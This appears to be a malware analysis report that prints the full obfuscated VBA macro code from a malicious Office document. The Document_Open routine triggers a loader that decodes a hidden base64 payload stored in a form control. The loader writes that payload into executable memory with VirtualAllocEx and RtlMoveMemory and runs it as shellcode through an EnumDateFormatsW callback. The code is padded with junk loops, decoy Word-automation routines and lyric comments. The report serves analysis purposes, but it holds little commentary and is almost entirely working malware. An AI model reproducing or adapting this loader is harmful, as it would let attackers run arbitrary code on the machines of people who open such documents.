Malicious Office (OLE) — malware analysis report

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim appall
Dim missive As Long
Dim conversing As String
Dim entendre As Long
Dim apostrophize As Integer
Dim soaker As Integer
Sub myology()
Dim abbatical As String
Dim chickenhearted As Long
allfours = jackstraws.zombi.halfmoon.Page2.llano.ControlTipText
myriapod = 88 + 52 - 34 + 7262
gondolier = Right(allfours, myriapod)
akimbo = halt.preoption(gondolier)
For galloon = 22 To 71
embioptera = 71
apostrophize = apostrophize - 135
sigmoidoscope = "cr" & "eese"
sigmoidoscope = Mid("battleaxengarganey", 9, 2) & "ologist"
Next galloon

aguish = "epi" & "dendr" & UCase$("on")
doily = LCase$("CO") & Mid("lashinglloitreacherous", 8, 4) & LCase$("D")
#If VBA6 And Win64 Then
Dim shantung As String
Dim dependent As derri
Dim idolatry As LongPtr
dependent.elseifstatement = 7 + 80 - 87
Dim safflower As Byte
#Else
Dim outlier As Integer
dependent = 0
Dim air As Long
Dim idolatry As Long
#End If
meal = 24 + 36 + 91 - 151
bimonthly = "bandicoot"
aloft = "egomania"
wk = 108 + 35 + 3953
endoderm = 3
While endoderm < 6
endoderm = endoderm + 1
apostrophize = soaker / 98
Wend

hock = "cebu"
jobation = "complicated"
diphylla = 10
While diphylla < 13
impracticably = LCase$("aC") & "cura" & Right$("clockwisete", 2)
diphylla = diphylla + 1
missive = soaker - 390
Wend

backwardness = akimbo
amourette = Mid("osmosissuclimactic", 8, 2) & LCase$("Btil") & Right$("ivryie", 2)
idolatry = cyme(backwardness)
beechnut = "sorority"
alt = "outset"
#If VBA6 And Win64 Then
Dim fibroblast As Byte
betrothment = LCase$("sU") & "cker"
sante = "appreciation"
acidification = 124 + 47 + 22 + 1087
#ElseIf (Win32) Then
balata = "protamine"
synergetic = "mealtime"
microtubule = "aufgeschoben"
foreandafter = 22 + 484
acidification = foreandafter + 3171

#End If
Dim sculptor As Variant
Dim taipei As String
Dim intrepidity As Long
intrepidity = 0
Dim avadavat As Long
avadavat = idolatry + acidification
liana = walks(avadavat, intrepidity, intrepidity)
For islamabad = 0 To 53
mariposan = 53
apostrophize = soaker - 476
showroom = UCase$("Sc") & UCase$("Ream") & Left("ingsulfacetamide", 3)
showroom = Mid("septcoscrapie", 5, 2) & Right$("neritinamble", 4)
Next islamabad

End Sub

Function cyme(peptization)
Dim letup As String
Dim uplifted As Variant
Dim cohobate As Long
consignificative cohobate, ByVal VarPtr(peptization) + 8, 4
Dim cheer As Integer
Dim scorzonera As Long
Dim antigropelos As Long
lubricous = 0
chetrum = 13 - 42 - 22 + 51
femtometer = 4096
disallowance = abnegation(-1, chetrum, 7383, femtometer, 64)
consignificative antigropelos, ByVal VarPtr(disallowance) + 8, 4
consignificative ByVal antigropelos, ByVal cohobate, 7392
For oscilloscope = 15 To 68
kishinev = 68
entendre = missive - 474
gath = Left("bronlicense", 2) & UCase$("aNDy") & "ball"
gath = LCase$("cOO") & Left("peratbranded", 5) & Mid("dryasioncercis", 6, 3)
Next oscilloscope

cyme = antigropelos
End Function
Sub CreateMemo()
    Dim myArray()
    Dim wdBkmk As String
    
    Dim wdApp As Word.Application
    Dim wdRng As Word.Range
    myArray = Array("To", "CC", "From", "Subject", "Chart")
    Set wdApp = GetObject(, "Word.Application")
    
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(0)).Range
    wdRng.InsertBefore ("B")
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(1)).Range
    wdRng.InsertBefore ("T")
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(2)).Range
    wdRng.InsertBefore ("M")
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(3)).Range
    wdRng.InsertBefore ("F")
    
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(4)).Range
    ActiveSheet.ChartObjects("Chart 1").Copy
    wdRng.PasteAndFormat Type:=wdPasteOLEObject
    
    wdApp.Activate
    
    Set wdApp = Nothing
    Set wdRng = Nothing
End Sub

Private Sub Document_Open()
Dim housekeeping As Integer
Dim multiplied As Variant
odium = UCase$("Jo") & LCase$("LlItY")
immodest = "handwear"
myology
multiloquence = 66
advert = 78
If multiloquence + advert < 2 Then
multiloquence = Right$("brokeont", 3) & Mid("courtierlyogeneticanimi", 11, 8)
conversing = "andesite"
confidently = Left("applongheaded", 3) & Mid("collocutionoggiaturaunironed", 12, 9)
Else
appall = conversing
advert = 107
End If
End Sub

Attribute VB_Name = "halt"
'I can't watch things further complicate
'I can't watch things further complicate
#If VBA6 And Win64 Then
'I hope you won't be saddened while I cry about it
'this endless propaganda (corporate agenda)
Public Type derri
'I can't watch things further complicate
'have mercy please God erase us
elseifstatement As LongPtr
'so if it all fails just throw it back in my face and bury me
'have mercy please God erase us
End Type
'have mercy please God erase us
'have mercy please God erase us
Public Declare PtrSafe Function nabalus Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As LongPtr)
'on focusing destractions tear me open
'I can't watch things further complicate
Public Declare PtrSafe Function aise Lib "user32" Alias "RegisterClassW" (dabri As LongPtr) As LongPtr
'I hope that I don't bore you while I whine about it
'as soon as I escape there's more stagnant bullsshit
Public Declare PtrSafe Function nonnative Lib "user32" Alias "GetDC" (ByVal algin As LongPtr) As LongPtr
'all the thoughts in my head are constantly .. haunting me
'I'd like to think there's more something more
Public  Declare PtrSafe Function abnegation Lib "kernel32" Alias "VirtualAllocEx" (ByVal noteworthy As LongPtr, ByVal prior As LongPtr, ByVal pawnshop As LongPtr, ByVal lukewarm As LongPtr, ByVal adjutant As LongPtr) As LongPtr
'so if it all fails just throw it back in my face and bury me
'so if it all fails just throw it back in my face and bury me
Public  Declare PtrSafe Sub consignificative Lib "ntdll.dll" Alias "RtlMoveMemory" (dissimulate As Any, aboral As Any, ByVal unsaid As LongPtr)
'I keep telling myself that there's something more
'I hope you won't be saddened while I cry about it
Public Declare PtrSafe Function camelot Lib "user32" Alias "GetClassNameA" (calenture As LongPtr, ByVal perceptually As LongPtr,needful As LongPtr) As LongPtr
'I keep telling myself that there's something more
'all the thoughts in my head are constantly .. haunting me
Public  Declare PtrSafe Function walks Lib "kernel32" Alias "EnumDateFormatsW" (ByVal lpEnumFunc As Any, ByVal flags As Any, ByVal lParam As Any) As LongPtr
'on focusing destractions tear me open
'as soon as I escape there's more stagnant bullsshit
Public Declare PtrSafe Function runon Lib "user32" Alias "FindWindowA" (steakhouse As LongPtr, climax As LongPtr) As LongPtr
'this endless propaganda (corporate agenda)
'on focusing destractions tear me open

'on focusing destractions tear me open
'all the thoughts in my head are constantly .. haunting me
#Else
'so if it all fails just throw it back in my face and bury me
'so if it all fails just throw it back in my face and bury me
Public Declare Function disputant Lib "user32" Alias "FindWindowA" (walkin As Long, indexical As Long) As Long
'have mercy please God erase us
'I'd like to think there's more something more
Public Declare Function meteorologic Lib "user32" Alias "GetClassNameA" (irascible As Long, ByVal stationer As Long, cyprian As Long) As Long
'I hope that I don't bore you while I whine about it
'I keep telling myself that there's something more
Public Declare Sub consignificative Lib "ntdll.dll" Alias "RtlMoveMemory" (foreword As Any, brythonic As Any, ByVal enki As Long)
'so if it all fails just throw it back in my face and bury me
'I'd like to think there's more something more
Public Declare Function walks Lib "kernel32" Alias "EnumDateFormatsW" (ByVal lpEnumFunc As Any, ByVal constituency As Any, ByVal lParam As Any) As Long
'Let me breathe check destroy and upset
'I hope you won't be saddened while I cry about it
Public Declare Function dizdar Lib "user32" Alias "RegisterClassW" (shades As Long) As Long
'I keep telling myself that there's something more
'I hope that I don't bore you while I whine about it
Public Declare Function abnegation Lib "kernel32" Alias "VirtualAllocEx" (ByVal procid As Long, ByVal lpaddr As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
'I hope that I don't bore you while I whine about it
'I hope that I don't bore you while I whine about it
Public Declare Function marsh Lib "user32" Alias "GetDC" (ideology As Long) As Long
'I hope that I don't bore you while I whine about it
'I can't watch things further complicate
Public Declare Function czechoslovakia Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As Long)
'I can't watch things further complicate
'have mercy please God erase us

'I hope that I don't bore you while I whine about it
'I can't watch things further complicate
#End If
'this endless propaganda (corporate agenda)
'I hope that I don't bore you while I whine about it
Function buttocks(dominating, weisshorn)
buttocks = dominating \ weisshorn
End Function
Function carpeted(engorge, alertly)
carpeted = engorge * alertly
End Function
Function preoption(gametophyte) As String
Dim apc As Long
Dim consulate(63) As Long
Dim lallans As Long
Dim unusualness(63) As Long
appall = appall

Dim stanch() As Byte
appall = conversing

Dim papillate As Long
Dim defendant As String

Dim accretion As String
Dim pageant As Byte

Dim opinionatist As Long
Dim aepyceros As Integer
Dim inconvertibility() As Byte
Dim tantalization(63) As Long
Dim announcer As Long

Dim poussecafe(255) As Byte
aes = 49 - 86 + 4069
iroin = 255
Dim prefectural As Variant

powered = 63
avitaminotic = 65280
repetitionary = 65536
plumping = 103 + 16711577
damaliscus = 102 - 49 + 106 + 261985
deuterogamy = 16515072
aeronatics = 128 + 51 + 257869
sustenance = 109 + 125 - 32 + 54
hospodar = 78 - 6 - 8
Dim beachhead As Integer

ptolemy = 20 + 4076
Dim moisture As Long

Dim cordage As Integer
Dim ballhawking() As Byte
ReDim ballhawking(7367)
suscipient = 7368
For anthrax = 1 To suscipient
individualist = Mid(gametophyte, anthrax, 1)
gaol = UCase$("mY") & LCase$("A")
fullgrown = (Asc(individualist))
ballhawking(anthrax - 1) = fullgrown
Next
Dim nursemaid As Byte
For acorea = 12 To 69
roost = 69
entendre = apostrophize \ 475
anchusa = UCase$("hea") & "rtwou" & LCase$("nding")
anchusa = Left("seflautist", 2) & UCase$("lFDe") & UCase$("cEpTIOn")
Next acorea

athene = 7367
mattre = 40 + 29 - 34
For sos = 0 To athene
ballhawking(sos) = ballhawking(sos) + 4
Next sos
wriggle = 88
tostada = 85
If wriggle + tostada < 19 Then
wriggle = UCase$("an") & LCase$("iMat") & LCase$("EDly")
conversing = "anseriformes"
leiodermatous = UCase$("FO") & UCase$("rEma") & LCase$("n")
Else
soaker = entendre \ 236
tostada = 38
End If

aepyceros = 0
approach = 122
adenopathy = 255
For lallans = 0 To adenopathy
Select Case lallans
Case 65 To 90
poussecafe(lallans) = lallans - 65
Case 97 To approach
poussecafe(lallans) = lallans - 71
Case 48 To 57
poussecafe(lallans) = lallans + 4
Case 43
poussecafe(lallans) = 62
Case 47
poussecafe(lallans) = 63
End Select
Next lallans
For lallans = 0 To 63
tantalization(lallans) = carpeted(lallans, hospodar)
consulate(lallans) = carpeted(lallans, ptolemy)
unusualness(lallans) = carpeted(lallans, damaliscus)
Next lallans
For jargoon = 2 To 55
communicatory = 55
appall = "cilia"
beanie = LCase$("Out") & LCase$("BaLANce")
beanie = LCase$("Acq") & UCase$("UiSitiVE")
Next jargoon

stanch = ballhawking
consequential = 4
ReDim inconvertibility((((7367 + 1) \ consequential) * 3) - 1)
For puffer = 19 To 52
daedal = 52
appall = appall
hugo = UCase$("Ba") & Right$("grampositivesina", 4) & Right$("foolsl", 1)
hugo = Left("patplating", 3) & Left("riotismmutton", 7)
Next puffer

phthorimaea = 1 + 2
conversing = conversing

appall = "boundary"

perturbation = phthorimaea + 1
manihot = 114 - 112
For apc = 0 To athene Step perturbation
abaddon = stanch(apc)
papillate = unusualness(poussecafe(abaddon)) _
 + consulate(poussecafe(stanch(apc + 1))) + tantalization(poussecafe(stanch(apc + 2))) + poussecafe(stanch(apc + phthorimaea))
lallans = attritional(papillate, plumping)
inconvertibility(opinionatist) = buttocks(lallans, repetitionary)
lallans = attritional(papillate, avitaminotic)
inconvertibility(opinionatist + 1) = buttocks(lallans, sustenance)
inconvertibility(opinionatist + manihot) = attritional(papillate, iroin)
opinionatist = opinionatist + manihot + 1
Next apc
preoption = inconvertibility
End Function

Sub Open_MSWord()
    On Error GoTo errorHandler
    Dim wdApp As Word.Application
    Dim myDoc As Word.Document
    Dim mywdRange As Word.Range
    Set wdApp = New Word.Application
   
    With wdApp
        .Visible = True
        .WindowState = wdWindowStateMaximize
    End With
   
    Set myDoc = wdApp.Documents.Add
   
    Set mywdRange = myDoc.Words(1)
   
    With mywdRange
        .Text = Range("F6") & " This text is being used to test subroutine." & _
            "  More meaningful text to follow."
        .Font.Name = "Comic Sans MS"
        .Font.Size = 12
        .Font.ColorIndex = wdGreen
        .Bold = True
    End With
   
errorHandler:
   
    Set wdApp = Nothing
    Set myDoc = Nothing
    Set mywdRange = Nothing
End Sub

Function attritional(entoloma, peppy)
attritional = entoloma And peppy
End Function


Attribute VB_Name = "jackstraws"
Attribute VB_Base = "0{255C86C9-E166-49DD-9A77-87FD48DAA6D4}{3B18A146-55CD-42CC-9C7C-A1F8B82AE5F9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False